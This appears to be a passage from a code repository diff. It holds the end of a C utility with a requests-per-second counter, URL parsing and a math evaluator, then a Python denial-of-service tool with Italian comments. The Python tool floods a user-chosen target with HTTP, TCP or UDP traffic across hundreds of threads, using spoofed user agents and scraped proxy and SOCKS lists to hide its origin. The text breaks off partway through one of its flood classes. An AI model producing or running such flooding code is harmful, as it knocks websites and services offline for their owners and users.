for(i = 0;i<temp;i++)
|
||||
{
|
||||
sleep(1);
|
||||
printf("R/s: %d\n", rps);
|
||||
rps = 0;
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
char *stristr(const char *String, const char *Pattern)
|
||||
{
|
||||
char *pptr, *sptr, *start;
|
||||
uint slen, plen;
|
||||
for (start = (char *)String,
|
||||
pptr = (char *)Pattern,
|
||||
slen = strlen(String),
|
||||
plen = strlen(Pattern);
|
||||
slen >= plen;
|
||||
start++, slen--)
|
||||
{
|
||||
|
||||
while (toupper(*start) != toupper(*Pattern))
|
||||
{
|
||||
start++;
|
||||
slen--;
|
||||
|
||||
if (slen < plen)
|
||||
return(NULL);
|
||||
}
|
||||
sptr = start;
|
||||
pptr = (char *)Pattern;
|
||||
while (toupper(*sptr) == toupper(*pptr))
|
||||
{
|
||||
sptr++;
|
||||
pptr++;
|
||||
|
||||
if ('\0' == *pptr)
|
||||
return (start);
|
||||
}
|
||||
}
|
||||
return(NULL);
|
||||
}
|
||||
void freeparts()
|
||||
{
|
||||
return;
|
||||
if(returnparts[0]!=NULL) { free(returnparts[0]); }
|
||||
if(returnparts[1]!=NULL) { free(returnparts[1]); }
|
||||
if(returnparts[2]!=NULL) { free(returnparts[2]); }
|
||||
if(returnparts[3]!=NULL) { free(returnparts[3]); }
|
||||
if(returnparts[4]!=NULL) { free(returnparts[4]); }
|
||||
if(returnparts[5]!=NULL) { free(returnparts[5]); }
|
||||
if(returnparts[6]!=NULL) { free(returnparts[6]); }
|
||||
if(returnparts[7]!=NULL) { free(returnparts[7]); }
|
||||
/*if(returnparts[8]!=NULL) { free(returnparts[8]); }*/
|
||||
return;
|
||||
}
|
||||
void setupparts()
|
||||
{
|
||||
returnparts[0] = malloc(sizeof(struct urlparts));
|
||||
returnparts[1] = malloc(sizeof(struct urlparts));
|
||||
returnparts[2] = malloc(sizeof(struct urlparts));
|
||||
returnparts[3] = malloc(sizeof(struct urlparts));
|
||||
returnparts[4] = malloc(sizeof(struct urlparts));
|
||||
returnparts[5] = malloc(sizeof(struct urlparts));
|
||||
returnparts[6] = malloc(sizeof(struct urlparts));
|
||||
returnparts[7] = malloc(sizeof(struct urlparts));
|
||||
/*returnparts[8] = malloc(sizeof(struct urlparts));*/
|
||||
bzero(returnparts[0], sizeof(struct urlparts));
|
||||
bzero(returnparts[1], sizeof(struct urlparts));
|
||||
bzero(returnparts[2], sizeof(struct urlparts));
|
||||
bzero(returnparts[3], sizeof(struct urlparts));
|
||||
bzero(returnparts[4], sizeof(struct urlparts));
|
||||
bzero(returnparts[5], sizeof(struct urlparts));
|
||||
bzero(returnparts[6], sizeof(struct urlparts));
|
||||
bzero(returnparts[7], sizeof(struct urlparts));
|
||||
/*bzero(returnparts[8], sizeof(struct urlparts));*/
|
||||
returnparts[0]->name = "scheme";
|
||||
strcpy(returnparts[0]->separator, ":");
|
||||
returnparts[1]->name = "userid";
|
||||
strcpy(returnparts[1]->separator, "@");
|
||||
returnparts[2]->name = "password";
|
||||
strcpy(returnparts[2]->separator, ":");
|
||||
returnparts[3]->name = "host";
|
||||
strcpy(returnparts[3]->separator, "//");
|
||||
returnparts[4]->name = "port";
|
||||
strcpy(returnparts[4]->separator, ":");
|
||||
returnparts[5]->name = "path";
|
||||
strcpy(returnparts[5]->separator, "/");
|
||||
returnparts[6]->name = "param";
|
||||
strcpy(returnparts[6]->separator, ";");
|
||||
/*returnparts[7]->name = "query";
|
||||
strcpy(returnparts[7]->separator, "?");*/
|
||||
returnparts[7]->name = "fragment";
|
||||
strcpy(returnparts[7]->separator, "#");
|
||||
return;
|
||||
}
|
||||
int parseURL(char *url, struct urlparts **returnpart) {
|
||||
register i;
|
||||
int seplen;
|
||||
char * remainder;
|
||||
//char * regall = ":/;?#";
|
||||
char * regall = ":/;#";
|
||||
//char * regpath = ":;?#";
|
||||
char * regpath = ":;#";
|
||||
char * regx;
|
||||
if(!*url)
|
||||
{
|
||||
strcpy(parseError, "nothing to do!\n");
|
||||
return 0;
|
||||
}
|
||||
if((remainder = malloc(strlen(url) + 1)) == NULL)
|
||||
{
|
||||
printf("cannot allocate memory\n");
|
||||
exit(-1);
|
||||
}
|
||||
strcpy(remainder, url);
|
||||
if(firstpunc(remainder) == ':')
|
||||
{
|
||||
strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
|
||||
strleft(remainder, 1);
|
||||
}
|
||||
if (!strcmp(returnpart[scheme]->value, "mailto"))
|
||||
*(returnpart[host]->separator) = 0;
|
||||
for(i = 0; i < NUMPARTS; i++)
|
||||
{
|
||||
if(!*remainder)
|
||||
break;
|
||||
if(i == scheme || i == userid || i == password)
|
||||
continue;
|
||||
if(i == host && strchr(remainder, '@'))
|
||||
{
|
||||
if(!strncmp(remainder, "//", 2))
|
||||
strleft(remainder, 2);
|
||||
strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
|
||||
strleft(remainder, 1);
|
||||
if(strchr(remainder, '@'))
|
||||
{
|
||||
strcpy(returnpart[password]->value, strsplit(remainder, "@"));
|
||||
strleft(remainder, 1);
|
||||
}
|
||||
*(returnpart[host]->separator) = 0;
|
||||
}
|
||||
if(i == path && (! *(returnpart[scheme]->value)))
|
||||
{
|
||||
*(returnpart[path]->separator) = 0;
|
||||
strcpy(returnpart[scheme]->value, "http");
|
||||
}
|
||||
regx = (i == path) ? regpath : regall ;
|
||||
seplen = strlen(returnpart[i]->separator);
|
||||
if(strncmp(remainder, returnpart[i]->separator, seplen))
|
||||
continue;
|
||||
else
|
||||
strleft(remainder, seplen);
|
||||
strcpy(returnpart[i]->value, strsplit(remainder, regx));
|
||||
}
|
||||
if(*remainder)
|
||||
sprintf(parseError, "I don't understand '%s'", remainder);
|
||||
free(remainder);
|
||||
return 0;
|
||||
}
|
||||
char *str_replace(char *orig, char *rep, char *with) {
|
||||
char *result;
|
||||
char *ins;
|
||||
char *tmp;
|
||||
int len_rep;
|
||||
int len_with;
|
||||
int len_front;
|
||||
int count;
|
||||
if (!orig)
|
||||
return NULL;
|
||||
if (!rep || !(len_rep = strlen(rep)))
|
||||
return NULL;
|
||||
if (!(ins = strstr(orig, rep)))
|
||||
return NULL;
|
||||
if (!with)
|
||||
with = "";
|
||||
len_with = strlen(with);
|
||||
for (count = 0; tmp = strstr(ins, rep); ++count) {
|
||||
ins = tmp + len_rep;
|
||||
}
|
||||
tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
|
||||
if (!result)
|
||||
return NULL;
|
||||
while (count--) {
|
||||
ins = strstr(orig, rep);
|
||||
len_front = ins - orig;
|
||||
tmp = strncpy(tmp, orig, len_front) + len_front;
|
||||
tmp = strcpy(tmp, with) + len_with;
|
||||
orig += len_front + len_rep;
|
||||
}
|
||||
strcpy(tmp, orig);
|
||||
return result;
|
||||
}
|
||||
char * strsplit(char * s, char * tok) {
|
||||
#define OUTLEN (255)
|
||||
register i, j;
|
||||
static char out[OUTLEN + 1];
|
||||
for(i = 0; s[i] && i < OUTLEN; i++)
|
||||
{
|
||||
if(strchr(tok, s[i]))
|
||||
break;
|
||||
else
|
||||
out[i] = s[i];
|
||||
}
|
||||
out[i] = 0;
|
||||
if(i && s[i])
|
||||
{
|
||||
for(j = 0; s[i]; i++, j++) s[j] = s[i];
|
||||
s[j] = 0;
|
||||
}
|
||||
else if (!s[i])
|
||||
*s = 0;
|
||||
return out;
|
||||
}
|
||||
char firstpunc(char * s) {
|
||||
while(*s++)
|
||||
if(!isalnum(*s)) return *s;
|
||||
return 0;
|
||||
}
|
||||
int strleft(char * s, int n) {
|
||||
int l;
|
||||
l = strlen(s);
|
||||
if(l < n)
|
||||
return -1;
|
||||
else if (l == n)
|
||||
*s = 0;
|
||||
memmove(s, s + n, l - n + 1);
|
||||
return n;
|
||||
}
|
||||
//BEGIN COMPLICATED MATH STUFF
|
||||
int evalmath(char *input)
|
||||
{
|
||||
char *output = malloc((strlen(input)*2)+1);
|
||||
memset(output, 0, (strlen(input)*2)+1);
|
||||
struct stack
|
||||
{
|
||||
int data[40];
|
||||
int top;
|
||||
} X;
|
||||
char *i = input;
|
||||
char *p = output;
|
||||
char n1;
|
||||
X.top = -1;
|
||||
int debugstack = 0;
|
||||
|
||||
int prio(char op)
|
||||
{
|
||||
int pri = 0;
|
||||
if(op == '*' || op == '/' || op =='%')
|
||||
pri = 2;
|
||||
else
|
||||
{
|
||||
if(op == '+' || op == '-')
|
||||
pri = 1;
|
||||
}
|
||||
return pri;
|
||||
}
|
||||
|
||||
void push(int num)
|
||||
{
|
||||
if(X.top != 39)
|
||||
{
|
||||
if(debugstack) printf("push'd %d\n", num);
|
||||
++X.top;
|
||||
X.data[X.top]=num;
|
||||
}
|
||||
}
|
||||
|
||||
int pop()
|
||||
{
|
||||
int popd=(int)-1;
|
||||
if(X.top != -1)
|
||||
{
|
||||
popd= X.data[X.top];
|
||||
--X.top;
|
||||
}
|
||||
if(debugstack) printf("pop'd %d\n", popd);
|
||||
return popd;
|
||||
}
|
||||
|
||||
while(*i)
|
||||
{
|
||||
while(*i == ' ' || *i == '\t')
|
||||
{
|
||||
i++;
|
||||
}
|
||||
if( isdigit(*i) || isalpha(*i) )
|
||||
{
|
||||
while( isdigit(*i) || isalpha(*i))
|
||||
{
|
||||
*p = *i;
|
||||
p++;
|
||||
i++;
|
||||
}
|
||||
*p = ' ';
|
||||
p++;
|
||||
}
|
||||
if( *i == '(' )
|
||||
{
|
||||
push(*i);
|
||||
i++;
|
||||
}
|
||||
if( *i == ')')
|
||||
{
|
||||
n1 = pop();
|
||||
while( n1 != '(' )
|
||||
{
|
||||
*p = n1;
|
||||
p++;
|
||||
*p = ' ';
|
||||
p++;
|
||||
n1 = pop();
|
||||
}
|
||||
i++;
|
||||
}
|
||||
if(*i == '+' || *i == '-' || *i == '*' || *i == '/' || *i == '%')
|
||||
{
|
||||
if(X.top == -1)
|
||||
{
|
||||
push(*i);
|
||||
}
|
||||
else
|
||||
{
|
||||
n1 = pop();
|
||||
while(prio(n1) >= prio(*i))
|
||||
{
|
||||
*p = n1;
|
||||
p++;
|
||||
*p = ' ';
|
||||
p++;
|
||||
n1 = pop();
|
||||
}
|
||||
push(n1);
|
||||
push(*i);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
while(X.top != -1)
|
||||
{
|
||||
n1 = pop();
|
||||
*p = n1;
|
||||
p++;
|
||||
*p = ' ';
|
||||
p++;
|
||||
}
|
||||
*p = '\0';
|
||||
|
||||
memset(&X, 0, sizeof(X));
|
||||
|
||||
X.top = -1;
|
||||
|
||||
//debugstack = 1;
|
||||
|
||||
char *outorig = output;
|
||||
|
||||
while(*output)
|
||||
{
|
||||
while(*output == ' ') output++;
|
||||
if(*output == '\0') return pop();
|
||||
if(!isdigit(*output))
|
||||
{
|
||||
int op2;
|
||||
int match = 0;
|
||||
if(debugstack) printf("op %c\n", *output);
|
||||
switch(*output) {
|
||||
case '+':
|
||||
push(pop() + pop());
|
||||
match = 1;
|
||||
break;
|
||||
case '*':
|
||||
push(pop() * pop());
|
||||
match = 1;
|
||||
break;
|
||||
case '-':
|
||||
push(pop() - pop());
|
||||
match = 1;
|
||||
break;
|
||||
case '/':
|
||||
op2 = pop();
|
||||
push(pop() / op2);
|
||||
match = 1;
|
||||
break;
|
||||
}
|
||||
if(match) output++; continue;
|
||||
}
|
||||
int n = *output - '0';
|
||||
output++;
|
||||
while(isdigit(*output))
|
||||
{
|
||||
n = 10 * n + *output - '0';
|
||||
output++;
|
||||
}
|
||||
push(n);
|
||||
if(*output == '\0') return pop();
|
||||
output++;
|
||||
}
|
||||
|
||||
free(outorig);
|
||||
|
||||
return pop();
|
||||
}
|
||||
//END COMPLICATED MATH STUFF
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,597 @@
|
|||
import socket
|
||||
import socks
|
||||
import threading
|
||||
import random
|
||||
import re
|
||||
import urllib.request
|
||||
import os
|
||||
import sys
|
||||
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
import logging
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # per evitare di visualizzare l'errore d'avvio di scapy
|
||||
|
||||
if sys.platform.startswith("linux"): # se si è sotto linux
|
||||
from scapy.all import * # importa scapy
|
||||
elif sys.platform.startswith("freebsd"): # o sotto freebsd
|
||||
from scapy.all import * # importa scapy
|
||||
else: # altrimenti
|
||||
print ("TCP/UDP FLOOD ARE NOT SUPPORTED UNDER THIS SYSTEM. YOU MUST USE HTTP FLOOD.") # printa questo
|
||||
|
||||
|
||||
useragents=["Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
|
||||
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko",
|
||||
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1",
|
||||
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
|
||||
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
|
||||
"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56",
|
||||
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",]
|
||||
|
||||
|
||||
def checkurl(): # in questa funzione setto l'url per renderlo usabile per il futuro settaggio delle richieste HTTP.
|
||||
global url
|
||||
global url2
|
||||
global urlport
|
||||
|
||||
url = input("Insert URL/IP: ")
|
||||
|
||||
if url == "":
|
||||
print ("Please enter the url.")
|
||||
checkurl()
|
||||
|
||||
try:
|
||||
if url[0]+url[1]+url[2]+url[3] == "www.":
|
||||
url = "http://" + url
|
||||
elif url[0]+url[1]+url[2]+url[3] == "http":
|
||||
pass
|
||||
else:
|
||||
url = "http://" + url
|
||||
except:
|
||||
print("You mistyped, try again.")
|
||||
checkurl()
|
||||
|
||||
try:
|
||||
url2 = url.replace("http://", "").replace("https://", "").split("/")[0].split(":")[0]
|
||||
except:
|
||||
url2 = url.replace("http://", "").replace("https://", "").split("/")[0]
|
||||
|
||||
try:
|
||||
urlport = url.replace("http://", "").replace("https://", "").split("/")[0].split(":")[1]
|
||||
except:
|
||||
urlport = "80"
|
||||
|
||||
floodmode()
|
||||
|
||||
def floodmode():
|
||||
global choice1
|
||||
choice1 = input("Do you want to perform HTTP flood '0', TCP flood '1' or UDP flood '2' ? ")
|
||||
if choice1 == "0":
|
||||
proxymode()
|
||||
elif choice1 == "1":
|
||||
try:
|
||||
if os.getuid() != 0: # se il programma NON e' stato eseguito come root:
|
||||
print("You need to run this program as root to use TCP/UDP flooding.") # printa questo
|
||||
exit(0) # e esce
|
||||
else: # altrimenti
|
||||
floodport() # continua
|
||||
except:
|
||||
pass
|
||||
elif choice1 == "2":
|
||||
try:
|
||||
if os.getuid() != 0: # se il programma NON e' stato eseguito come root:
|
||||
print("You need to run this program as root to use TCP/UDP flooding.") # printa questo
|
||||
exit(0) # e esce
|
||||
else: # altrimenti
|
||||
floodport() # continua
|
||||
except:
|
||||
pass
|
||||
else:
|
||||
print ("You mistyped, try again.")
|
||||
floodmode()
|
||||
|
||||
def floodport():
|
||||
global port
|
||||
try:
|
||||
port = int(input("Enter the port you want to flood: "))
|
||||
portlist = range(65535) # range di tutte le porte informatiche
|
||||
if port in portlist: # se la porta selezionata rientra nel range
|
||||
pass # continua
|
||||
else: # altrimenti
|
||||
print ("You mistyped, try again.")
|
||||
floodport() # riparte la funzione e ti fa riscrivere
|
||||
except ValueError: # se da' errore di valore
|
||||
print ("You mistyped, try again.") # printa questo e
|
||||
floodport() # riparte la funzione e ti fa riscrivere
|
||||
proxymode()
|
||||
|
||||
def proxymode():
|
||||
global choice2
|
||||
choice2 = input("Do you want proxy/socks mode? Answer 'y' to enable it: ")
|
||||
if choice2 == "y":
|
||||
choiceproxysocks()
|
||||
else:
|
||||
numthreads()
|
||||
|
||||
def choiceproxysocks():
|
||||
global choice3
|
||||
choice3 = input("Type '0' to enable proxymode or type '1' to enable socksmode: ")
|
||||
if choice3 == "0":
|
||||
choicedownproxy()
|
||||
elif choice3 == "1":
|
||||
choicedownsocks()
|
||||
else:
|
||||
print ("You mistyped, try again.")
|
||||
choiceproxysocks()
|
||||
|
||||
def choicedownproxy():
|
||||
choice4 = input("Do you want to download a new list of proxy? Answer 'y' to do it: ")
|
||||
if choice4 == "y":
|
||||
choicemirror1()
|
||||
else:
|
||||
proxylist()
|
||||
|
||||
def choicedownsocks():
|
||||
choice4 = input("Do you want to download a new list of socks? Answer 'y' to do it: ")
|
||||
if choice4 == "y":
|
||||
choicemirror2()
|
||||
else:
|
||||
proxylist()
|
||||
|
||||
def choicemirror1():
|
||||
global urlproxy
|
||||
choice5 = input ("Download from: free-proxy-list.net='0', inforge.net='1' or skypegrab.com='2' ")
|
||||
if choice5 == "0":
|
||||
urlproxy = "http://free-proxy-list.net/"
|
||||
proxyget1()
|
||||
elif choice5 == "1":
|
||||
inforgeget()
|
||||
elif choice5 == "2":
|
||||
urlproxy = "http://skypegrab.net/proxy/http.txt"
|
||||
proxyget2()
|
||||
else:
|
||||
print("You mistyped, try again.")
|
||||
choicemirror1()
|
||||
|
||||
def choicemirror2():
|
||||
global urlproxy
|
||||
choice5 = input ("Download from: socks-proxy.net='0', inforge.net='1' or skypegrab.com='2' ")
|
||||
if choice5 == "0":
|
||||
urlproxy = "https://www.socks-proxy.net/"
|
||||
proxyget1()
|
||||
elif choice5 == "1":
|
||||
inforgeget()
|
||||
elif choice5 == "2":
|
||||
urlproxy = "http://skypegrab.net/proxy/socks.txt"
|
||||
proxyget2()
|
||||
else:
|
||||
print("You mistyped, try again.")
|
||||
choicemirror2()
|
||||
|
||||
def proxyget1(): # lo dice il nome, questa funzione scarica i proxies
|
||||
try:
|
||||
req = urllib.request.Request(("%s") % (urlproxy)) # qua impostiamo il sito da dove scaricare.
|
||||
req.add_header("User-Agent", random.choice(useragents)) # siccome il format del sito e' identico sia
|
||||
sourcecode = urllib.request.urlopen(req) # per free-proxy-list.net che per socks-proxy.net,
|
||||
part = str(sourcecode.read()) # imposto la variabile urlproxy in base a cosa si sceglie.
|
||||
part = part.split("<tbody>")
|
||||
part = part[1].split("</tbody>")
|
||||
part = part[0].split("<tr><td>")
|
||||
proxies = ""
|
||||
for proxy in part:
|
||||
proxy = proxy.split("</td><td>")
|
||||
try:
|
||||
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
|
||||
except:
|
||||
pass
|
||||
out_file = open("proxy.txt","w")
|
||||
out_file.write("")
|
||||
out_file.write(proxies)
|
||||
out_file.close()
|
||||
print ("Proxies downloaded successfully.")
|
||||
except: # se succede qualche casino
|
||||
print ("\nERROR!\n")
|
||||
proxylist() # se va tutto liscio allora prosegue eseguendo la funzione proxylist()
|
||||
|
||||
def proxyget2():
|
||||
try:
|
||||
if os.path.isfile("proxy.txt"):
|
||||
out_file = open("proxy.txt","w") # cancella tutto il contenuto
|
||||
out_file.write("") # di proxy.txt
|
||||
out_file.close()
|
||||
else:
|
||||
pass
|
||||
req = urllib.request.Request(urlproxy) # url corrisponde a una serie di urls impostati sotto.
|
||||
req.add_header("User-Agent", random.choice(useragents)) # aggiunge uno user agent a caso dalla lista sopra
|
||||
sourcecode = urllib.request.urlopen(req, timeout = 10) # scaricamento sourcecode pagina + timeout impostato a 10
|
||||
for line in sourcecode :
|
||||
ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line)) # cerca proxy
|
||||
ipf = list(set(ip)) # cancella i doppioni
|
||||
if ipf: # se trova ip prosegue
|
||||
for x in ipf:
|
||||
out_file = open("proxy.txt","a")
|
||||
while True:
|
||||
out_file.write(x+"\n") # scrive ip uno per uno nel file proxy.txt
|
||||
out_file.close()
|
||||
break # appena finisce ferma il ciclo
|
||||
print ("Proxies downloaded successfully.") # se li scarica correttamente, printa questa scritta
|
||||
except:
|
||||
print ("\nERROR!\n") # printa qua
|
||||
proxylist() # se tutto e' andato a buon fine, prosegue eseguendo proxylist()
|
||||
|
||||
def inforgeget(): # anche questa funzione scarica proxy pero' da inforge.net
|
||||
try:
|
||||
if os.path.isfile("proxy.txt"):
|
||||
out_file = open("proxy.txt","w") # cancella tutto il contenuto
|
||||
out_file.write("") # di proxy.txt
|
||||
out_file.close()
|
||||
else:
|
||||
pass
|
||||
url = "https://www.inforge.net/xi/forums/liste-proxy.1118/"
|
||||
soup = BeautifulSoup(urllib.request.urlopen(url)) # per strasformare in "zuppa" la source del sito
|
||||
print ("\nDownloading from inforge.net in progress...")
|
||||
base = "https://www.inforge.net/xi/" # questi comandi servono per trovare i link nella sezione
|
||||
for tag in soup.find_all("a", {"class":"PreviewTooltip"}): # liste-proxy del forum
|
||||
links = tag.get("href") #
|
||||
final = base + links # composizione links
|
||||
result = urllib.request.urlopen(final) # finalmente apre i link trovati
|
||||
for line in result :
|
||||
ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line)) # cerca gli ip:porta nelle pagine
|
||||
if ip: # se ha trovato gli ip prosegue
|
||||
for x in ip:
|
||||
out_file = open("proxy.txt","a") # scrittura singolo ip nella proxy.txt
|
||||
while True:
|
||||
out_file.write(x+"\n")
|
||||
out_file.close()
|
||||
break # il ciclo si ferma non appena ha finito
|
||||
print ("Proxies downloaded successfully.") # se li scarica correttamente, printa questa scritta
|
||||
except: # se qualcosa va storto
|
||||
print ("\nERROR!\n") # printa qua
|
||||
proxylist() # se tutto e' andato a buon fine, prosegue eseguendo proxylist()
|
||||
|
||||
def proxylist():
|
||||
global proxies
|
||||
out_file = str(input("Enter the proxylist filename/path (proxy.txt): "))
|
||||
if out_file == "":
|
||||
out_file = "proxy.txt"
|
||||
proxies = open(out_file).readlines()
|
||||
numthreads()
|
||||
|
||||
def numthreads():
|
||||
global threads
|
||||
try:
|
||||
threads = int(input("Insert number of threads (800): "))
|
||||
except ValueError:
|
||||
threads = 800
|
||||
print ("800 threads selected.\n")
|
||||
begin()
|
||||
|
||||
def begin():
|
||||
choice6 = input("Press 'Enter' to start attack: ")
|
||||
if choice6 == "":
|
||||
loop()
|
||||
elif choice6 == "Enter": #lool
|
||||
loop()
|
||||
elif choice6 == "enter": #loool
|
||||
loop()
|
||||
else:
|
||||
exit(0)
|
||||
|
||||
def loop():
|
||||
global threads
|
||||
global get_host
|
||||
global acceptall
|
||||
global connection
|
||||
global go
|
||||
global x
|
||||
if choice1 == "0": # se si e' scelta la http flood, scrive gli header "statici" per non appesantire i threads
|
||||
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + url2 + "\r\n"
|
||||
acceptall = ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n", "Accept-Encoding: gzip, deflate\r\n", "Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n"]
|
||||
connection = "Connection: Keep-Alive\r\n" # la keep alive torna sempre utile lol
|
||||
x = 0 # thanks therunixx, my friend
|
||||
go = threading.Event()
|
||||
if choice1 == "1": # se si e' scelto tcp flood
|
||||
if choice2 == "y": # e si e scelta la modalita' proxying
|
||||
if choice3 == "0": # e si sono scelti gli HTTP proxy
|
||||
for x in range(threads):
|
||||
tcpfloodproxed(x+1).start() # starta la classe apposita
|
||||
print ("Thread " + str(x) + " ready!")
|
||||
go.set() # questo fa avviare i threads appena sono tutti pronti
|
||||
else: # altrimenti se si sono scelto è il tcp flood con socks
|
||||
for x in range(threads):
|
||||
tcpfloodsocked(x+1).start() # starta la classe apposita
|
||||
print ("Thread " + str(x) + " ready!")
|
||||
go.set() # questo fa avviare i threads appena sono tutti pronti
|
||||
else: # se non si sono stati scelti proxy o socks
|
||||
for x in range(threads):
|
||||
tcpflood(x+1).start() # starta la classe apposita
|
||||
print ("Thread " + str(x) + " ready!")
|
||||
go.set() # questo fa avviare i threads appena sono tutti pronti
|
||||
else: # oppure:
|
||||
if choice1 == "2": # se si e' scelto l'UDP flood
|
||||
if choice2 == "y": # e si e' scelta la modalita' proxying
|
||||
if choice3 == "0": # e si sono scelti gli HTTP proxy
|
||||
for x in range(threads):
|
||||
udpfloodproxed(x+1).start() # starta la classe apposita
|
||||
print ("Thread " + str(x) + " ready!")
|
||||
go.set() # questo fa avviare i threads appena sono tutti pronti
|
||||
else: # se si sono scelti i socks
|
||||
for x in range(threads):
|
||||
udpfloodsocked(x+1).start() # starta la classe apposita
|
||||
print ("Thread " + str(x) + " ready!")
|
||||
go.set() # questo fa avviare i threads appena sono tutti pronti
|
||||
else: # se non si sono scelti proxy o socks per l'udp flood
|
||||
for x in range(threads):
|
||||
udpflood(x+1).start() # starta la classe apposita
|
||||
print ("Thread " + str(x) + " ready!")
|
||||
go.set() # questo fa avviare i threads appena sono tutti pronti
|
||||
else: # se si è scelto l'http flood
|
||||
if choice2 == "y": # se abbiamo scelto la modalita' proxying
|
||||
if choice3 == "0": # e abbiamo scelto gli HTTP proxy
|
||||
for x in range(threads):
|
||||
requestproxy(x+1).start() # starta la classe apposita
|
||||
print ("Thread " + str(x) + " ready!")
|
||||
go.set() # questo fa avviare i threads appena sono tutti pronti
|
||||
else: # se abbiamo scelto i socks
|
||||
for x in range(threads):
|
||||
requestsocks(x+1).start() # starta la classe apposita
|
||||
print ("Thread " + str(x) + " ready!")
|
||||
go.set() # questo fa avviare i threads appena sono tutti pronti
|
||||
else: # altrimenti manda richieste normali non proxate.
|
||||
for x in range(threads):
|
||||
requestdefault(x+1).start() # starta la classe apposita
|
||||
print ("Thread " + str(x) + " ready!")
|
||||
go.set() # questo fa avviare i threads appena sono tutti pronti
|
||||
|
||||
class tcpfloodproxed(threading.Thread): # la classe del multithreading
|
||||
|
||||
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
|
||||
threading.Thread.__init__(self)
|
||||
self.counter = counter
|
||||
|
||||
def run(self): # la funzione che da' le istruzioni ai vari threads
|
||||
data = random._urandom(1024) # data per il pacchetto random
|
||||
p = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # costruzione pacchetto tcp + data
|
||||
current = x # per dare l'id al thread
|
||||
if current < len(proxies): # se l'id del thread si puo' associare ad un proxy, usa quel proxy
|
||||
proxy = proxies[current].strip().split(':')
|
||||
else: # altrimenti lo prende a random
|
||||
proxy = random.choice(proxies).strip().split(":")
|
||||
go.wait() # aspetta che tutti i proxy siano pronti
|
||||
while True:
|
||||
try:
|
||||
socks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True) # comando per il proxying HTTP
|
||||
s = socks.socksocket() # creazione socket
|
||||
s.connect((str(url2),int(port))) # si connette
|
||||
s.send(p) # ed invia
|
||||
print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter) # print req + counter
|
||||
except: # se si verifica un errore
|
||||
s.close() # chiude il thread e ricomincia
|
||||
|
||||
class tcpfloodsocked(threading.Thread): # la classe del multithreading
|
||||
|
||||
def __init__(self, counter): # funzione messa su praticamente solo per il counter dei threads. Il parametro counter della funzione, passa l'x+1 di sopra come variabile counter
|
||||
threading.Thread.__init__(self)
|
||||
